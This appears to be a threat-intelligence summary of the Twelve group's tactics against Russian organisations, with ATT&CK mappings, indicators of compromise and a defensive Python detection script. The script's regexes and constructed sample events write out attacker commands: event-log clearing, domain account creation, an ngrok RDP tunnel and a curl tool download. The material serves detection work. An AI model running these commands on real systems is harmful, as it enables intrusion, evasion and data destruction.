Two sentences: Twelve is a hacktivist-aligned group, formed in April 2023 amid the Russian-Ukrainian conflict, that encrypts and deletes victim data, exfiltrates sensitive information and posts it to Telegram, and frequently shares techniques with the DARKSTAR ransomware group. The analysis uses the Unified Kill Chain to detail their reconnaissance, exploitation, persistence, and impact, including ransomware, wipers, and data leakage. #TwelveGroup #DARKSTAR #LockBit3 #Shamoon #CobaltStrike #Mimikatz #Ngrok #Telegram

Keypoints

  • The Twelve group formed in April 2023 and has targeted Russian government organizations.
  • They encrypt and delete data, exfiltrate sensitive information, and publish it on Telegram to maximize impact.
  • Twelve shares infrastructure and techniques with the DARKSTAR ransomware group, suggesting a close linkage.
  • Publicly available tools (e.g., Cobalt Strike, mimikatz, PowerShell) are heavily used in their operations.
  • Initial access commonly comes from valid local/domain accounts and VPN/SSH certificates, with RDP for lateral movement.
  • Persistence is maintained via web shells and backdoors; defense evasion includes log clearing and disguising malware.
  • Ransomware (LockBit 3.0) and wipers are used to destroy victim infrastructure; the operations are hacktivist rather than financially driven.

MITRE Techniques

  • [T1021.001] Remote Desktop Protocol – Lateral movement using RDP after gaining access to victim infrastructure. “…The attackers used the Remote Desktop Protocol (RDP) to move laterally.”
  • [T1133] External Remote Services – Initial access to target networks via VPN or SSH certificates. “initial access … VPN or SSH certificates.”
  • [T1078] Valid Accounts – Gained initial access through valid local or domain accounts. “gained initial access to victims’ infrastructure through valid local or domain accounts…”
  • [T1090] Proxy – Pivoting traffic through ngrok to reach systems via RDP. “The adversary used ngrok to tunnel traffic… all illegitimate connections to the system via RDP were made through ngrok.”
  • [T1105] Ingress Tool Transfer – Delivery of tools to compromised hosts using curl and wget. “The curl and wget system utilities to deliver various tools to compromised hosts.”
  • [T1016] System Network Configuration Discovery – Discovery of networked assets via tools like Advanced IP Scanner and BloodHound to map the environment.
    “Advanced IP Scanner can quickly identify all devices on a given network… BloodHound is used to analyze and visualize users and systems the domain trusts”
  • [T1087.002] Account Discovery: Domain Account – Discovery of domain user accounts using the PowerView module.
    “discover domain user accounts”
  • [T1003.001] OS Credential Dumping: LSASS Memory – Mimikatz usage to obtain credentials from LSASS memory.
    “Used mimikatz to obtain user credentials.”
  • [T1059] Command and Scripting Interpreter – Extensive use of PowerShell and self-written scripts.
    “The attackers used system interpreters and publicly available tools… self-written .bat and PowerShell scripts”
  • [T1053] Scheduled Task/Job – Creation of scheduled tasks to run ransomware and wipers.
    “Created scheduled tasks to execute ransomware and wipers.”
  • [T1021.006] Remote Services: Windows Remote Management – Interactive PowerShell Remoting sessions via Enter-PSSession on remote machines.
    “Enter-PSSession -ComputerName [COMPUTER 1]”
  • [T1098] Account Manipulation – Use of legitimate credentials and PowerView to modify ACLs and add domain users in order to escalate privileges.
    “Modified ACLs and added domain users to escalate privileges.”
  • [T1136] Create Account – Adding domain accounts and groups to widen access.
    “net user … /domain”; “net group … /domain”
  • [T1036] Masquerading – Disguising malware and tasks under names of legitimate products/services.
    “disguised their malware and tasks under the names of existing products or services.”
  • [T1070] Indicator Removal on Host – Clearing event logs to hide activity.
    “cleared the event logs with the wevtutil.exe system utility”
  • [T1562] Impair Defenses – Hiding traces and masking activity; renaming tasks and logs.
    “hide the traces of their activity”
  • [T1486] Data Encrypted for Impact – Ransomware encrypting data and demanding ransom.
    “encrypt data and demand ransom”
  • [T1567.002] Exfiltration to Cloud Storage – Exfiltrated sensitive data to external file-sharing services.
    “Exfiltrated sensitive data to external file-sharing services.”
  • [T1505.003] Server Software Component: Web Shell – Deployment of PHP web shells for remote access.
    “installed PHP web shells on compromised servers for remote access.”
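Most of the behaviours quoted above leave a process command line behind (wevtutil clearing a log, schtasks creating a task, net user /add /domain, ngrok exposing port 3389, curl or wget pulling a file, Enter-PSSession). The following added example, which is not code from the Securelist article, turns that observation into a small rule set that triages constructed process-creation events per host and tags each hit with the ATT&CK sub-technique ID for the quoted behaviour. The event field names (Computer, Image, CommandLine), host names, paths and every sample command line are assumptions invented for the demonstration; the regexes are deliberately narrow so the reader can see which token each rule keys on.

```python
"""Map process-creation command lines to the ATT&CK behaviours in the Twelve summary.

Added example, not from the Securelist article. Field names follow the usual
Sysmon Event ID 1 / Windows 4688 layout but are assumptions, and all sample
events below are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    technique: str       # ATT&CK (sub-)technique ID for the behaviour
    name: str
    pattern: re.Pattern  # searched against "<Image> <CommandLine>", case-insensitive


RULES = [
    # T1070.001: "wevtutil cl <log>" clears a Windows event log
    Rule("T1070.001", "Event log cleared with wevtutil",
         re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I)),
    # T1053.005: scheduled task created to run a binary from a user-writable path
    Rule("T1053.005", "Scheduled task runs binary from temp/public/programdata",
         re.compile(r"\bschtasks(\.exe)?\s+.*?/create\b.*?(\\temp\\|\\public\\|\\programdata\\)", re.I)),
    # T1136.002: domain account creation via net.exe
    Rule("T1136.002", "Domain account created with net user",
         re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b.*?/domain\b", re.I)),
    # T1090: ngrok tunnelling an RDP listener (port 3389)
    Rule("T1090", "ngrok tunnel exposing RDP",
         re.compile(r"\bngrok(\.exe)?\s+tcp\s+(\S+:)?3389\b", re.I)),
    # T1105: curl/wget fetching a remote file onto the host
    Rule("T1105", "Ingress tool transfer with curl/wget",
         re.compile(r"\b(curl|wget)(\.exe)?\s+.*?https?://", re.I)),
    # T1021.006: interactive PowerShell Remoting session
    Rule("T1021.006", "Enter-PSSession to remote host",
         re.compile(r"\bEnter-PSSession\b", re.I)),
]


def match_event(event: dict) -> list[tuple[str, str]]:
    """Return (technique, rule name) for every rule the event's command line hits."""
    text = f"{event.get('Image', '')} {event.get('CommandLine', '')}"
    return [(r.technique, r.name) for r in RULES if r.pattern.search(text)]


def triage(events: list[dict]) -> dict[str, list[str]]:
    """Group matched technique IDs by host, in event order, so a responder sees the chain per machine."""
    hits: dict[str, list[str]] = {}
    for ev in events:
        for technique, _ in match_event(ev):
            hits.setdefault(ev["Computer"], []).append(technique)
    return hits


# Constructed sample telemetry (not from the article); host names and paths are made up.
SAMPLE_EVENTS = [
    {"Computer": "SRV-FILE01", "Image": "C:\\Windows\\System32\\wevtutil.exe",
     "CommandLine": "wevtutil.exe cl Security"},
    {"Computer": "SRV-FILE01", "Image": "C:\\Windows\\System32\\schtasks.exe",
     "CommandLine": 'schtasks /create /tn "Update Service" /tr C:\\ProgramData\\enc.exe /sc once /st 23:00'},
    {"Computer": "DC01", "Image": "C:\\Windows\\System32\\net.exe",
     "CommandLine": "net user svc_backup P@ss /add /domain"},
    {"Computer": "WS-ADMIN7", "Image": "C:\\Users\\Public\\ngrok.exe",
     "CommandLine": "ngrok.exe tcp 3389"},
    {"Computer": "WS-ADMIN7", "Image": "C:\\Windows\\System32\\curl.exe",
     "CommandLine": "curl.exe -o C:\\Users\\Public\\tool.exe http://example.invalid/tool.exe"},
    {"Computer": "WS-ADMIN7", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe Enter-PSSession -ComputerName DC01"},
    {"Computer": "WS-USER3", "Image": "C:\\Windows\\explorer.exe",
     "CommandLine": "explorer.exe"},  # benign; must not match any rule
]

if __name__ == "__main__":
    for host, techniques in triage(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(techniques))
```

Per-host grouping is the design point: a single wevtutil or schtasks invocation is common administrative noise, but the same host producing a log clear and a task that runs a binary from ProgramData, or a workstation that runs ngrok, a curl download and Enter-PSSession in sequence, is the kind of clustering the summary describes and is what an analyst should escalate.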

Indicators of Compromise

  • [IP Address] context – 212.109.217.88, 195.2.79.195, and other listed IPs used for command and control and infrastructure.
  • [Domain] context – dropmefiles.net used for exfiltration via cloud sharing services.
  • [File] context – twelve.exe, enc.exe, and other ransomware/wiper filenames seen in incidents.
  • [Hash] context – 05d80c987737e509ba8e6c086df95f7d, 48b2e5c49f121d257b35ba599a6cd350 (web-shell/file-hash examples) and additional hashes listed in the article.

Read more: https://securelist.com/twelve-group-unified-kill-chain/113877/